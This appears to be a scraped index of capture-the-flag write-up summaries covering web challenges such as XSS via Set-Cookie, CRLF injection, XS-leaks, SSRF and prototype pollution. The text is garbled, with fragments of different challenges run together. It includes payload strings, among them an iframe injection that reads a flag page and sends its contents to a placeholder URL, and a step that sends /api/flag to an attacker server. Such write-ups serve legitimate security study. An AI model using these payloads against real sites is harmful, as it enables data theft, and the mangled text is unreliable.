tl;dr
- Notepad 1 - Use Set-Cookie header to get XSS on the Admin
- Notepad 1.5 - CRLF on the name parameter of Golang’s
Header().Set()method - Notepad 2 - Xsleaks using
Timing-Allow-Originheader
tl;dr
Header().Set() methodTiming-Allow-Origin headertl;dr
strncat in merge allows for an overwrite onto the next regiontl;dr
/source to get the sourcedev_test using SSRFtl;dr
tl;dr
/verify_roles?role=supersuperuseruser\ud800","name":"admin{"constructor":{"prototype":{"test":"123"}}} in config-handlertl;dr
sha256('')./api/flag and send it to attacker server.tl;dr
tl;dr
lcase('inKypinKy')id from dualheader("location:http://web/user.php?session=1111-22222-1234&sub=submit");header("location:http://web/flag.php?session=<iframe id="a" src="http://web/flag.php?session=1111-22222-1234&sub=submit" onload=window.location="<URL>?"+btoa(document.getElementById('a').contentWindow.document.body.innerText)>&sub=submit")tl;dr
tl;dr